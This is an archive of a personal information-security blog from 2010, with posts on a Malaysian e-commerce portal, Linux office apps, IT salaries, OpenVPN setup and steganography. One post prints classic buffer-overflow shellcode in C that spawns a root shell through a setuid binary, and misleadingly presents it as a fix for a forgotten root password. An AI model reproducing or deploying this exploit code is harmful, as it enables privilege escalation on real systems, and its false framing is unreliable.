My experience on my daily works... helping others ease each other

Thursday, December 30, 2010

Friday, December 10, 2010

eniaga - Good Initiative but Worst Implementation

Have you come across new government initiatives? eNiaga.

It seem that either the company providing that portal is just wanna get money and deliver a portal or don't care about money (which I guarantee the company gets lots of money) but just wanna deliver a portal to help government in their initiative. Either reason, they failed to deliver at least to minimum portal interface. When I take a look at this (on 11 December 2010), I'm little bit surprise with the interface, layout, friendliness, etc. It is none here. Check it out here http://eniaga.gov.my

What is the problem?
1. Compare with Amazon, Google Book, Lowyat Net, and other portal. All items are clearly categories and segmentize. Here, everything was shown flashing in and out.

2. When you click on the menu display on your left side, it shows another page which also did the same things. What if you wanna find clothes for man? How? Looking at the design, I bet you need to wait until the product shown on the screen and then click as soon as possible as it will change to other product in a few seconds.

3. How to use the system? You need to guess. No Fact or Help that you can select.

4. Over cluttered. The display shows too many and too fast and as I said earlier, no segmentation.

5. What's next? Is this first @ trial version of the portal? Not sure. But if I were one of the people involves, I will not even release this to market yet as I know what portal means and what business portal means and also what usability means. This don't fit in to any of those. It can only be used for showcase something, but not for usage or user. It might be use to win a tender but it shall not be use as a production release.
Share:

10 obscure Linux office applications to try

If you've ever checked out the list of applications available for the Linux operating system (OS), you know there are tons of them out there. The only problem is determining which ones are worth trying.
This is especially true of office applications. You could dig through those apps for hours just to come up with a handful of gems. So I thought I would do the grunt work for you and highlight 10 of the more obscure applications that actually have valid use in your workplace. These tools range in scope and purpose, but each one of them offers an obvious business value.

1: PDF Chain
PDF Chain
is a great graphical tool that allows you to merge, split, set background or watermark, and add attachments to PDF documents. It's a front end for pdftk and is written in gtkmm. You can merge up to 26 PDFs into one file. You can also rotate pages, set permissions for pages, and encrypt pages. If you work with PDF documents, PDF Chain is a must-have on the Linux platform.

2: gLabels
gLabels
is an incredibly flexible label and business card designer for the GNOME desktop. It will work with almost all inkjet or laser peel-off labels and business card sheets. Not only does gLabels allow you to design labels and cards with the same types of tools you would find in image editing software, it also offers a mail-merge feature that any business user will appreciate.

3: Kraft
Kraft
is a KDE business organizational tool that helps you create and manage business communications documents. Kraft really shines in the area of creating invoices, offers, etc. It also helps you manage customers, create text templates, perform calculations, manage materials, create PDFs, and much more.

4: MDB Viewer
MDB Viewer
can save you a ton of time, effort, and worry by allowing you to read data from a Microsoft Access database (MDB file). It serves as a user-friendly interface for MDB Tools. If MDB Viewer doesn't offer you enough, you can give Kexi a go. Kexi is a KDE-based data management app.

5: Okular
Okular
is the Linux answer to the Mac OS X Preview tool. Okular is a universal file viewer that can view PDF, images, Postscript, DjVu, CHM, and many other file formats. From Okular, you can print documents, extract text, view information, search documents, and much more. The developers are currently working on annotation of PDF documents, which will further enhance Okular's use.

6: GoldenDict
GoldenDict
is a dictionary manager that serves as a one-stop-shop for all your dictionary needs. It lets you manage dictionaries of all types, including Babylon, StartDict, Dictd, and ABBYY Lingvo. GoldenDict supports Wikipedia/Wictionary/Media-Wiki lookups and enables you to search for and listen to pronunciations from forvo.com. GoldenDict also allows you to search for words using a Hunspell-based morphology system for word stemming and spelling-based suggestions. If you use multiple dictionaries in your office, you need a dictionary manager like GoldenDict.

7: Simple Scan
Simple Scan is a scanning utility that ships with Ubuntu and really does live up to its name. Its user-friendly interface makes it easy for any user, at any level of competency, to create scans as either images or PDF files. Unfortunately, if your scanner isn't supported in Linux, Simple Scan will not work. Simple Scan was created by Canonical for Ubuntu but now is available for other distributions, such as Fedora.

8: RedNoteBook
RedNoteBook
is a great journaling application that allows you to create journal entries and then tag, spell check, format, add images/links/files, do a live search, use word clouds, export to various formats, and translate them into more than 20 languages. With RedNoteBook, you can create templates that will make your journaling even simpler. You can also make annotations and view statistics of your entries.

9: TOra
TOra
is an outstanding GUI that allows you to manage most of the common database formats (Oracle, MySQL, Postgresql). It has been built for Linux, Windows, and Mac and offers regular database queries and browsing. It includes a SQL worksheet with syntax highlighting, a PL/SQL debugger, and a full set of DBA tools. Although TOra isn't directed toward the average office user, anyone who needs to manage a database will appreciate it.

10: KeePassX
KeePassX
is a must-have for anyone who has to remember a lot of passwords or other forms of secure data. With this tool, you can save user names, passwords, URLs, sign-on information, attachments, and comments in a single, protected database. This database of sensitive information is then encrypted with either AES or Twofish, using a 256-bit key. KeePassX has a user-friendly interface that any level of user will find easy to use.

Do you have a favorite? As you can see, Linux (and open source) offers a wide assortment of office applications. I have tried to give the largest cross-section of types so that you will be tempted to take a deeper look into what's available.

Jack Wallen was a key player in the introduction of Linux to the original Techrepublic. Beginning with Red Hat 4.2 and a mighty soap box, Jack had found his escape from Windows. It was around Red Hat 6.0 that Jack landed in the hallowed halls of Techrepublic.

From ZDNet Asia Website
Share:

Google Chrome Notebook - Is it safe?

I received a video from a friend of my via facebook. It was about Google Chrome Notebook. Here is the video



What I would like to discuss here is the security concern when using this. No doubt that this will save us a lot especially there will no worries of losing unfinished work when your machine crash and no worries of carrying extra hard-disk for storing your data and no worries of where to get your data when you are on vacation. The only things you need to ensure is to have very good internet connection (stability and high bandwidth) which here in Malaysia it is still far from achieving it (I'll discuss this in other issues).

What concern me as one of people involves in information security is security issues related to using Chrome Notebook. What about our privacy and data protection. How safe are we? How trusted are we on Google which will not leak our data to others? How safe is Google and how strong Google protecting our data from being hack/exploit/access by unwanted user? Will Google be able to handle tons of data? How good and reliable is the Chrome Notebook?

This are few basic questions circling my thought when I first saw this video. When Facebook came into the pictures, there are security concern and there are still as Facebook never block other people from copying pictures they found in the facebook. What do you think about Chrome? Will Chrome have the ability to prevent others from cut-n-paste your documents into theirs?

This are basic security that Chrome MUST address first or at least those people that have intention to use Chrome notebook to think about it and reconsider before making such decision. It is Mobility, Flexibility, Cost Saving, and Availability versus Privacy, Trust, and Data Protection.
Share:

Wednesday, December 8, 2010

Steganography - What you need to know

Steganography

by CyberSecurity Malaysia on Wednesday, December 8, 2010 at 3:36pm
Q: How to detect steganography image?

A: Steganography images cannot be seen with the human eyes, only a piece of software was able to detect it. The difference between the images is not noticeable to the human eye what so ever. Two files look almost identical apart from the fact that one is larger than the other, it is most probable your suspect file has hidden information inside of it.

Q: How to embed data/message in image?

A: The most common technique that has been used is LSB (Least Significant Bit). When files are created there are usually some bytes in the file that aren't really needed, or at least aren't that important. These areas of the file can be replaced with the information that is to be hidden, with out significantly altering the file or damaging it. This allows a person to hide information in the file and make sure that no human could detect the change in the file. The LSB method works best in Picture files that have a high resolution and use many different colors, and with Audio files that have many different sounds and that are of a high bit rate. The LSB method usually does not increase the file size, but depending on the size of the information that is to be hidden inside the file, the file can become noticeably distorted.

This site shows how exactly message bits embedded to the picture using the LSB. http://www.guillermito2.net/stegano/camouflage/index.html


Q: What is raw image steganalysis?

A: There are 3 techniques in Raw Image Steganalysis (http://airccse.org/journal/nsa/1010s4.pdf) :-

A1: The Raw image steganalysis technique is primarily used for BMP images that are characterized by a lossless LSB plane. LSB embedding on such images causes the flipping of the two grayscale values. The embedding of the hidden message is more likely to result in averaging the frequency of occurrence of the pixels with the two gray-scale values. For example, if a raw image has 20 pixels with one gray-scale value and 40 pixels with the other gray-scale value, then after LSB embedding, the count of the pixels with each of the two gray-scale values is expected to be around 30. It is based on the assumption that the message length should be comparable to the pixel count in the cover image (for longer messages) or the location of the hidden message should be known (for smaller messages).

A2: Another steganalysis algorithm for grayscale images. This algorithm assumes an image to be made up of horizontally adjacent pixels and classifies the set of all such pixel pairs (a, b) into four subsets depending on whether a and b are odd or even and whether a < b, a > b or a = b. The pixel values get modified when message embedding is done in the LSB plane, thereby leading to membership modifications across these four subsets. A statistical analysis on the changes in the membership of the pixels in the stego image leads to the detection of the length of the hidden message.

A3: This is a steganalysis technique that studies color bitmap images for LSB embedding and it provides high detection rates for shorter hidden messages. This technique makes use of the property that the number of unique colors for a high quality bitmap image is half the number of pixels in the image. The new color palette that is obtained after LSB embedding is characterized by a higher number of close color pairs (i.e., pixel pairs that have a maximum difference of one count in either of the color planes). We say that two colors (R1, G1, B1) and (R2, G2, B2) are close if |R1-R2| <= 1 and |G1-G2| <= 1 and |B1-B2| <= 1. Let P be the ratio of the close color pairs to the total number of unique colors in the cover image, P’ be the ratio of close color pairs to the total number of unique colors in a stego image obtained by embedding a new message of particular length in a cover image and P’’ be the ratio of the close color pairs to the total number of unique colors when the cover image is further embedded in the stego image. If the hidden message is of considerable length, it has been observed that P’ > P and P’’ ~ P. For shorter messages, the values of P and P’ will be closer and detection may not be possible. Also, the above technique will not work if the cover image stored in lossless format has a higher number of unique colors (more than half the number of pixels).

Q:  Could you suggest some Steganography tools?

A: Here are some tools that you might want to try.
- http://www.snapfiles.com/php/download.php?id=101911
- http://www.mirrors.wiretapped.net/security/steganography/blindside/
- http://www.darkside.com.au/gifshuffle/
- http://www.wbailer.com/wbstego

Taken from CSM Facebook
Share:

Monday, December 6, 2010

Malaysia: IT Salary Benchmark 2010

ZDNet Asia conducted an online survey between October 2009 and November 2010, to gain insights into salary trends and the IT workforce in Asia.
The study polled a total of 14,998 respondents from various sectors including government, healthcare, IT, services, telecommunications, legal and finance, and across eight Asian economies: China, Hong Kong, India, Indonesia, Malaysia, the Philippines, Singapore and Thailand.
There were 1,136 respondents from Malaysia, holding full-time positions with job functions that cut across several areas such as systems development, project management and support.
In addition, 59 respondents from the economy were either contract or independent consultants, while another 11 held part-time positions, working fewer than 28 hours a week.
Respondents who had IT management responsibilities in the IT, Web and telco sector were the highest paid among their peers in Malaysia, pulling in an average salary of 98,627 ringgit a year.
In the following charts, MYR denotes the Malaysian ringgit. 

Average annual salary by IT skills and years of experience (MYR)
IT Skills
Years of Experience
Less than 5 years
5-10 years
More than 10 years
Application Development
39,157
66,979
102,291
Desktops/Software
36,582
57,185
90,285
Operating Systems
37,377
57,497
92,849
Servers/Networking
36,726
58,797
92,891
Web Development
35,151
63,213
-
Systems Administration
38,666
58,387
90,455
Database Management
37,810
59,198
96,226
IT Security
35,435
63,619
88,271
Enterprise Applications
-
66,755
100,710
IT Outsourcing
41,367
-
-
Consulting/Business Services
-
65,741
106,728
Infrastructure Management
-
-
98,734
Storage
35,573
-
-

Average annual salary by job function and years of experience (MYR)
Job Function
Years of Experience
Less than 5 years
5-10 years
More than 10 years
IT Management
31,072
71,866
105,789
Project Management
46,308
73,544
98,496
Systems Development
38,492
65,355
75,772
Communications
35,365
58,968
71,422
Support
30,732
39,770
56,856
Administration
42,403
56,237
75,922
Other IT Professionals
37,677
76,103
106,593
Overall
38,243
64,443
94,173

Average annual salary of Top 10 most popular IT skills (MYR)
Rank
% of Respondents
IT Skills
Average Annual Salary
#1
45.6
Application Development
69,602
#2
43.1
Servers/Networking
64,390
#3
43.1
Desktops/Software
62,841
#4
41.8
Operating Systems
64,407
#5
38
System Administration
64,826
#6
29.5
Web Development
63,802
#7
27
Database Management
65,252
#8
25.6
IT Security
65,842
#9
25.3
Enterprise Applications
73,874
#10
25
Infrastructure Management
79,794

Average annual salary by job function and industry (MYR)
Job Function
INDUSTRY
IT, Web & Telecom
Government, Education
& Health
Legal & Finance
Media, Marketing
& Sales
(non-IT)
Manufacturing, Services
& Others (non-IT)
Overall
IT Management
98,627
73,329
97,304
69,684
82,773
88,872
Project Management
77,102
67,633
81,543
56,600
72,870
75,757
Systems Development
52,833
40,099
60,092
49,500
53,827
52,891
Communications
53,046
51,400
52,800
72,000
42,580
51,615
Support
41,860
35,816
31,510
28,343
35,677
38,426
Administration
56,233
49,831
70,541
41,581
45,239
54,165
Other IT Professionals
77,294
72,000
-
50,667
62,000
74,620
Overall
65,140
55,728
71,199
54037
60,340
63,713

Taken from ZDNet Asia News
Share:

Sunday, November 28, 2010

World Computer Security Day 2010

This year theme is Managing Risk
53 ways to participate/observe the Computer Security Day

  1. Display computer security posters.
  2. Present computer security briefings.
  3. Change your password.
  4. Check for computer viruses.
  5. Show computer security videos, films or slides.
  6. Protect against static electricity.
  7. Modify the logon message on your computer system to notify users that Computer Security Day is November 30.
  8. Vacuum your computer and the immediate area.
  9. Clean the heads on your disk drives or other magnetic media drives.
  10. Back-up your data. (after being certain that it is virus-free.)
  11. Delete unneeded files.
  12. Initiate a computer security poster design contest for next year.
  13. Demonstrate computer security software.
  14. Publicize existing computer security policy.
  15. Issue new and improved computer security policy.
  16. Declare an amnesty day for computer security violators who wish to reform.
  17. Announce COMPUTER SECURITY DAY in your internal newsletter.
  18. Examine the audit files on your computers.
  19. Verify that the "Welcome" message that is normally used on your computer is appropriate for your organization.
  20. Write-protect all diskettes that are not to be written to.
  21. Take the write-protect rings out of the tapes in your library.
  22. Verify your inventory of computer applications.
  23. Verify your inventory of computer utilities and packaged software.
  24. Verify your inventory of computer hardware.
  25. Install and inspect power surge protection as appropriate.
  26. Install fire/smoke detection and suppression equipment in computer areas.
  27. Eliminate dust from computer areas, including chalk dust.
  28. Provide dust and water covers for personal and larger computers.
  29. Post "No Drinking" and "No Smoking" signs in computer areas.
  30. Develop a recovery plan for all computer systems that require one.
  31. Verify that passwords are not "Posted" and all other keys are secured.
  32. Verify that backup power and air conditioning fit your needs.
  33. Have a mini training session to provide all computer users with a basic understanding of computer security.
  34. Verify that all source code is protected from unauthorized changes.
  35. Verify that each computer has trouble log and that it is being used.
  36. Verify that appropriate off site storage exists and is being used.
  37. Remove all unnecessary items such as extra supplies, coat racks, and printouts from the computer room.
  38. Select a computer system on which to perform a risk analysis.
  39. Begin planning for next year's COMPUTER SECURITY DAY.
  40. Change the FORMAT command in DOS to avoid accidentally FORMATing of disks.
  41. Protect the computer on your store-and-forward phone message system.
  42. Hold a discussion of ethics with computer users.
  43. Volunteer to speak about computer security at a local computer club or school.
  44. Collect Computer Security Day memorabilia to trade with others.
  45. Register and pay for all commercial software that is used on your computer.
  46. Register and pay for all shareware that you use regularly.
  47. Install all security-related updates to your computer's operating system.
  48. Help a computer novice backup their files.
  49. Protect all cabin computers from floating droplets of liquid.
  50. Plan to attend a computer security meeting or seminar.
  51. Consider the privacy aspect of the data on your computer and protect it.
  52. Update your anti-virus program
  53. Add to this list – things that you believe would benefit all advocates of computer security
Share:

Wednesday, November 24, 2010

How to verified email address? A way to prevent scam, spam, etc

How to Verify an Email Address?

How do you verify if a given email address is real or fake? Well an obvious solution is that you send a test mail to that email address and if your message doesn’t bounce, it is safe to assume* that the address is real.


[*] Some web domains may have configured a catch-all email address meaning that messages addressed to a non-existent mailbox will not be returned to the sender but in most cases, such email messages will bounce.

So how can we verify that:
Check here were the author (Amit Agarwal) show how to verify the email...
1. http://www.labnol.org/software/verify-email-address/18220/
2. http://lifehacker.com/5697360/how-to-verify-if-an-email-address-is-real-or-fake
Share:

Saturday, November 20, 2010

Bing Bar Causing IE failed to close

I did install Microsoft bing bar to allow me to access Microsoft search capability and others tools in IE. It works fine for quite sometimes. However, last few days, I was unable to close the IE. I did end the process at Task Manager and do lots of things as suggested (check for malware, adware, spyware, etc) but nothing could solve the problem.

Then I found one process running whenever I open up IE. It is the bing bar process. When I end the process, disable the bing bar, my IE no longer have issue to close it down. I believe there is some loop-holes in the bar being utilized to compromise the computer.

So, if any of you had the same problem (unable to terminate IE), remove your bing bar and it should work again.
Share:

Friday, November 19, 2010

WiTopia - Is it safe?

I read a recent articles on protecting yourself from firesheep (a mozilla plugin that meant for good but becoming as a tool for hackers). Read the articles here.

The author that link the articles to another articles he wrote at blog.techrepublic.Here he explains on how WiTopia could provide a secure tunnel between the client and the server that the client wish to connect to or communicate with.

However, the author do forget something here. TRUST between both parties. The question here is CAN WE TRUST WiTopia to keep all our confidential information, such as username and password? Compare to RIM which provide such services for their blackberry phones whereby all information from the devices (email, etc) were stored in their server located in Canada (and few other places). There was great concern on their security and trustworthiness and few countries has requested that the server shall be allocated at their country rather than outside.

So can we trust WiTopia to keep our secret? Is WiTopia safe from being attack or hack? How can we ensure that? Since WiTopia will decrypt our request, relay to the requested site/server, get the response, and relay back in encrypted format to us. It may be secure between client and WiTopia server, but beyond that is no longer secure. That in terms of Trust.

What about Privacy? Shall we trust the service provider with all our privacy data being decrypted and can be seen in the server? How WiTopia protect our secrecy and privacy? Will there be possibility of leakage or it is fully protected even the WiTopia developers or system administrator don't know what is happening (which is impossible for him if in the event he need to do some tracing or maintenance or bugs fixing)?

This are great concern before you proceed with the advice of the author. I'm not saying that using WiTopia is not helping you securing yourself from using wireless devices, but please do get the information on how WiTopia works completely before making such decision.
Share:

Browser contains serious bugs

Chrome, Safari, Office top list for serious bugs



Chrome was the application with the most number of high-severity vulnerabilities that impacted end users this year, followed by Safari, Microsoft Office, Adobe Reader and Acrobat, and Firefox, according to a list to be released today.

Chrome had 76 reported serious vulnerabilities, Safari had 60, Office had 57, Acrobat and Reader had 54, and Firefox had 51, according to Bit9's annual "Dirty Dozen" list.

The fact that Chrome is at the top of the list does not necessarily mean it is less secure than other applications, said Harry Sverdlove, chief technology officer at Bit9.

"Chrome is the youngest of the browsers out there and is going through the most changes," he said. "It doesn't mean it's a risky browser."

Rounding out the list were: Sun Java Development Kit (36 reported holes), Adobe Shockwave Player (35), Microsoft Internet Explorer (32), RealNetworks RealPlayer (14), Apple Webkit (9), Adobe Flash Player (8), while Apple QuickTime and Opera were tied in last place with 6 vulnerabilities each.

Apple appears on the list three times, "which dispels the myth that Apple is safer" than Windows, Sverdlove said. "They are as vulnerable, if not more so, as Microsoft Windows."
The applications were pulled from the U.S. National Institute of Standards and Technology's official vulnerability database. They all had a severity rating of high.

The method of just focusing on the number of reported vulnerabilities is not without controversy. As Mozilla pointed out two years ago, the Bit9 study ignores issues like how quickly the bugs are fixed, and it punishes companies like Google and Mozilla that publicly disclose all vulnerabilities while other companies disclose only publicly discovered holes and not those found internally. It also fails to recognize that some companies lump multiple vulnerabilities into one report in the vulnerability database. In addition, there have been concerns about the quality and presentation of data in the vulnerability databases themselves, as mentioned by Google earlier this year.

This article was first published as a blog post on CNET News and extracted from ZDNet Asia
Share:

Cambridge Brain Science

Test your brain how it works

http://cbstrials.com/Open/Default.aspx?B_ID=279
Share:

Wednesday, November 17, 2010

For good purpose but with bad implications

If you forgot your root password and wish to access it to change... They code below can be used :)
#include "string.h"
#include "stdio.h"
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];

int main(int argc, char **argv){
char buffer[96];
int i;

long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < (int) strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer, large_string);

return 0;
}
HOWEVER... it is strictly for your own purposes ONLY. It shall not be used as hacking tool.
Use VM to test it out :) 

to test:
$ gcc bof.c
$ su
Password:
# chown root.root a.out
# chmod u+s a.out
$ whoami
YourName
$ ./a.out
$ whoami
root



You know gain root shell access and can execute anything as root rights... Scary ya...
Share:

Friday, November 12, 2010

Looking for tool to derive AST from Source Code

I'm looking for a program (or source code written either using java or C language) which be able to take source-code (single or multiple file) and establish AST (abstract syntax tree), PDG (Program Dependency Graph), and CFG (Control Flow Graph).

I've been searching quite sometime but has yet to found any. Most of the tool I found take executable or binary files likes CodeSonar/x86 and IDAPro which does not suite my research.

If any of you know about it, please share the information with me.

Really thankful for all help given :)
Share:

Tips & Trick for setting up OpenVPN

Having a virtual private network affords a lot of convenience, particularly for those who want or need to access a remote network from a different location, such as connecting to a work network from home, or vice versa. With the availability of 3G on the road, or wireless hotspots everywhere, being able to connect, securely, to a remote private network from anywhere is ideal.

OpenVPN is one of the most reliable VPN setups around. It's fully open source, it's supported on Linux, Windows, and OS X, it's robust, and it's secure. Unfortunately, configuration can be a bit of a pain, so in a series of upcoming tips, I aim to get you up and running quickly.
To begin, you will need to have OpenVPN installed on the server or system you wish to use as a VPN end-point. Most distributions include OpenVPN; for the server setup, I am using OpenVPN 2.0.9 as provided by the RPMForge repository for CentOS 5.

The first part of this series concentrates on the server, while the second and third parts will concentrate on the configuration of Linux and OS X clients, respectively. So without further ado, let's get our hands dirty.
To begin with, you need to copy some files from the OpenVPN docs directory (typically provided in /usr/share/doc/openvpn-[version]) to create certificates:
# cd /usr/share/doc/openvpn-2.0.9
# cp -av easy-rsa /etc/openvpn/
# cd /etc/openvpn/easy-rsa/
# vim vars

In the vars file, edit the KEY_* entries at the bottom of the file, such as KEY_COUNTRY, KEY_ORG, KEY_EMAIL, etc. These will be used to build the OpenSSL certificates. Next, it's time to initialize the PKI:
# . ./vars
# sh clean-all
# sh build-ca
# sh build-key-server server

For the above, and the below client certificates, you can enter pretty much anything for the "Common Name" field, however there is a certain logic to use: "OpenVPN-CA" when generating the Certificate Authority, "server" when generating the server certificate, and "client" or the name of the specific client system for the client certificates. Those certificates are generated with:
# sh build-key client1
# sh build-key client2

The next step is to generate the Diffie Hellman parameters for the server:
# sh build-dh

When this is done, you will have a number of files in the keys/ subdirectory. At this point, for the clients, you want to copy the appropriate files to them securely (i.e., via SSH or on a USB stick); the files the clients need are ca.crt, client1.crt, and client1.key (or whatever you named the files when you generated them with the build-key script).

Next, create the OpenVPN server configuration file. To get up and running quickly, copy one of the example config files:
# cd /etc/openvpn/
# cp /usr/share/doc/openvpn-2.0.9/sample-config-files/server.conf .
# vim server.conf

The aim here is to get this going right away, so we won't examine each of the options in detail. The primary things you want to do are to uncomment the "user" and "group" directives, to make the openvpn process run as the unprivileged "nobody" user. You may also want to change the "local" directive to make it listen to one specific IP address. This would be the IP to which your firewall is forwarding UDP port 1194. As well, you will want to set the "client-to-client" directive to enable it, and also set the "push" directives for route and DNS options. What follows is a comment-stripped server.conf, as an example:
local 192.168.10.11
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key  # This file should be kept secret
dh dh1024.pem
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "route 192.168.10.0 255.255.254.0"
push "dhcp-option DNS 192.168.10.12"
push "dhcp-option DOMAIN domain.com"
client-to-client
keepalive 10 120
comp-lzo
user nobody
group nobody
persist-key
persist-tun
status openvpn-status.log
verb 3

Finally, copy the required keys and certificates that you previously generated:
# cd  /etc/openvpn/
# cp easy-rsa/keys/ca.crt .
# cp easy-rsa/keys/server.{key,crt} .
# cp easy-rsa/keys/dh1024.pem  .

And, finally, start the OpenVPN server:
# /etc/init.d/openvpn start

To get routing set up properly on the server so that remote clients, when they connect, can reach more than just the server itself, you will need to enable IP forwarding. This can be done by the following:
# echo 1 > /proc/sys/net/ipv4/ip_forward

You can also do it by editing /etc/sysctl.conf and adding the following (this is a good thing to do as it will ensure that packet-forwarding persists across reboots):
net.ipv4.ip_forward = 1

You also want to ensure that packets going back to the client system are routed properly. This can be done by changing the route on the gateway of the server's network to route packets to the client network (10.8.0.1/32) through the OpenVPN server (if the server happens to be the gateway as well, you don't have to do anything additional to accomplish this). How this is done largely depends on the operating system of the gateway.

Once this is done, you should be able to ping any machine on the server's LAN from the client, and be able to ping the client from any machine on the server's LAN. For instance, from a machine on the server LAN (not the server):
% traceroute 10.8.0.6
traceroute to 10.8.0.6 (10.8.0.6), 64 hops max, 52 byte packets
1  fw (192.168.10.1)  0.848 ms  0.342 ms  0.249 ms
2  server (192.168.10.11)  0.214 ms  0.231 ms  0.243 ms
3  server (192.168.10.11)  0.199 ms !Z  0.443 ms !Z  0.396 ms !Z
% ping 10.8.0.6
PING 10.8.0.6 (10.8.0.6): 56 data bytes
64 bytes from 10.8.0.6: icmp_seq=0 ttl=63 time=17.540 ms

And from the client:
# traceroute 192.168.10.65
traceroute to 192.168.10.65 (192.168.10.65), 30 hops max, 40 byte packets
1  10.8.0.1 (10.8.0.1)  22.963 ms  27.311 ms  27.317 ms
2  10.8.0.1 (10.8.0.1)  27.297 ms !X  27.294 ms !X  27.269 ms !X
# ping 192.168.10.65
PING 192.168.10.65 (192.168.10.65) 56(84) bytes of data.
64 bytes from 192.168.10.65: icmp_seq=1 ttl=62 time=515 ms

The setting up of OpenVPN clients will be the subject of two tips in the next week. I've made the assumption that the client is correctly configured here, simply to illustrate how it should look when it all works together, but in the next parts of this series we will get into more depth with the client configuration.

The tips was taken from ZD NET ASIA shared by Vincent Danen (Red Hat Security Response Team)
Share:

Thursday, November 11, 2010

ALMUC 2010 Penang

Almuc 2010 Penang

ALMUC 2010 Penang is organized by myVSTS, a charter established in TechNation. myVSTS is a community group of Visual Studio users focused on Application Lifecycle Management. ALMUC 2010 Penang is one of the most remarkable events that bring together organizations from various sectors including governmental, non-governmental, private, international and bilateral organizations under one roof, thereby serving as the platform to share knowledge and experience of Visual Studio from the industry experts such as Microsoft Most Valuable Professional awardees.
Date: 1 December 2010
Time: 9:00am - 5:30pm
Venue: 1, Jalan Sultan Azlan Shah, Bandar Bayan Baru, Bayan Lepas, Penang.
Share:

Free E Book

Free eBook: Moving to Microsoft Visual Studio 2010

Still using Visual Studio 2008? Oops, you said 2005? Maybe 2003? We're pleased to announce another free offering from Microsoft Press (336 pages).
Share:

JCIT & JDCTA (Journal)

JCIT & JDCTA(EI cited): : Call for Papers and Special (Invited) Issues
JDCTA:
http://www.aicit.org/jdcta
JCIT:
http://www.aicit.org/jcit

Citation
: EI, INSPEC, DBLP, Google Scholar, DOI, Computer and Information Systems Abstracts


It is our pleasure to invite you to submit Papers, Invited (Special) Issue proposal to JCIT & JDCTA.


ISSN : 1975-9320


http://www.aicit.org/jcit

(Since 2006)





Citation
: EI, INSPEC, DBLP, Google Scholar, DOI, Computer and Information Systems Abstracts

Call for Papers and Special Issues

JCIT focuses on the theories/technologies/architecture and its applications on the various aspects of advances in convergence and hybrid Information Technology. JCIT always welcomes excellent papers on the traditional and convergence areas of information technologies and next generation information technologies.


SCOPE

JCIT
invites new and original submissions addressing theoretical and practical topics and its applications in convergence/hybrid information technology and next generation information technologies fields including (but not limited to these topics):

Topic 1: IT-based Convergence Technology and Service
Topic 2: HCI & Bioinformatics
Topic 3: Ubiquitous Computing
Topic 4: Business and Information Systems
Topic 5: Social and Business Aspects of Convergence IT and Ubiquitous Computing


Editorials and Details

For more details, see the web site:
http://www.aicit.org/jcit

ISSN : 1975-9339


http://www.aicit.org/jdcta

(Since 2007)







Citation
: EI, INSPEC, DBLP, Google Scholar, DOI, Computer and Information Systems Abstracts

Call for Papers and Special Issues

JDCTA is a refereed, multidisciplinary journal for bridging the latest advances in the digital content technologies and its applications. It provides an international forum for presenting authoritative references, academically rigorous research, and case studies.


Scope

The Journal JDCTA focuses on the theories/technologies/architecture and its applications on the various aspects of advances in the digital content technologies. JDCTA shall always welcome all research results on the traditional and hybrid areas of the digital content technologies and its applications(
but not limited to these topics).

Topic 1: Hybrid and Convergence IT and Service: Technology, Content, Service and its Applications
Topic 2: Digital Content: Technologies, Content, Design, Services and its Applications
Topic 3: HCI /Health/Bioinformatics relevant to Information Technology
Topic
4: Ubiquitous Computing: Content, Technology, Service and its Applications


Editorials and Details

For more details, see the web site:
http://www.aicit.org/jdcta

Share:

The 3rd Conference on Data Mining and Optimization

DMO’11: The 3rd Conference on Data Mining and Optimization
28 & 29 June 2011, Putrajaya, Malaysia

http://dmo.ukm.my/dmo11/
[Technical Co-sponsors: IEEE & IEEE Computer Society]

======================================

 
We would like to invite you and you colleagues to participate and present a research article at the 3rd Conference on Data Mining and Optimization.

 
The 3rd Conference on Data Mining and Optimization, or DMO’11, is a congregation of the top minds conducting theoretic, experimental, and professional research and applications in the fields of Data Mining and Optimization.  The combination of data mining and optimization provides the focus of discovering the best or most useful embedded information from large datasets, potentially providing strategic advantages in decision-making to practitioners of these two techniques.  Our aim is to bring together researchers, practitioners, and students who are conducting work in any of the sub-topics within these two areas, in an atmosphere of scientific discussion for a dynamic exchange of ideas regarding their latest results and advances in these two fields.
 
DMO’11 is organized by the Data Mining and Optimization Research Group, and sponsored by Universiti Kebangsaan Malaysia. The Technical Co-Sponsors for the conference are IEEE Malaysia Section and IEEE Computer Society Malaysia.  For further information regarding DMO’11 and the Data Mining and Optimization Research Group of UKM, visit:

http://dmo.ukm.my/dmo11/
 
DMO’11 is held in conjunction with M-CAIT’2011: The 1st International Multi-Conference on Artificial Intelligence Technology.  For more information regarding the M-CAIT’2011 multi-conference and all other sister conferences held at M-CAIT’2011, visit:

http://www.ftsm.ukm.my:8080/mcait2011/
 
------------------

TOPICS OF INTEREST

------------------

DATA & TEXT MINING:

* Data & text mining Tasks such as classification, estimation, prediction, clustering, association rules mining, deviation detection, similarity analysis, etc.

* Data & text mining Techniques such as neural networks, genetic algorithm, statistical analysis, artificial immune system and other soft computing techniques.

* Data & text Mining Applications in Medical, Healthcare, Electronic Commerce, Bioinformatics, Computer Security, Web Intelligence, Intelligent Learning Database Systems, Finance, Marketing, Healthcare, Telecommunications, and other fields.

* Optimization Techniques for Data & text mining.

 
OPTIMIZATION:

* Algorithms: Local Search, Meta-heuristic search, Heuristic Search, Evolutionary Algorithms, Constraint Logic Programming, Automated Reasoning.

* Applications: Shop-floor scheduling, Sport scheduling, Timetabling, Vehicle routing, Transport scheduling, Machine scheduling, Rostering.

 
----------------------

SUBMISSION INFORMATION

----------------------

You are invited to submit:

* A full paper (4 to 7 pages) for publication and oral presentation, or

* A short paper (less than 4 pages) for poster presentation, or

* A proposal to organize a technical session and/or workshop.

Selected articles will also be invited for publication in the International Journal of Advances in Soft Computing and Its Applications (IJASCA).  Visit the DMO’11 conference website for more details.

 
Please submit all papers and proposals through any of the following methods:

E-MAIL SUBMISSION:  dmo2011@ftsm.ukm.my

WEB SUBMISSION:  
http://dmo.ukm.my/dmo11/
All papers should be submitted in PDF format (A4 paper size), using the IEEE Conference Proceeding template:

http://www.ieee.org/conferences_events/conferences/publishing/templates.html
 
---------------

